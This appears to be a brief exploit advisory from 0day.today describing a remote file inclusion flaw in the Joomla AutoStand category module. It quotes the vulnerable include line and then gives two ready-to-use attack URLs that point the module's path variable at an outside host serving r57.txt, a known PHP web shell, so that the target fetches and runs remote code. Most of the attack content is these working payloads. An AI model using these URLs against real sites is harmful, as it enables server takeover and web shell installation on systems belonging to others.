Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability

===============================================================
Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability
===============================================================




=======================================================
Joomla Module AutoStand Category <= 1.1 Remote File include Vulnerabilities
=======================================================
Description: its a joomla module Shows the categories created
=======================================================

File : /mod_as_category/mod_as_category.php
#  include($mosConfig_absolute_path . 
"/components/com_autostand/languages/portuguese.php  <= line 10

# Don't allow direct acces to the file
  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' ); <= line  21+22
========================================================
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================



#  0day.today [2018-01-10]  #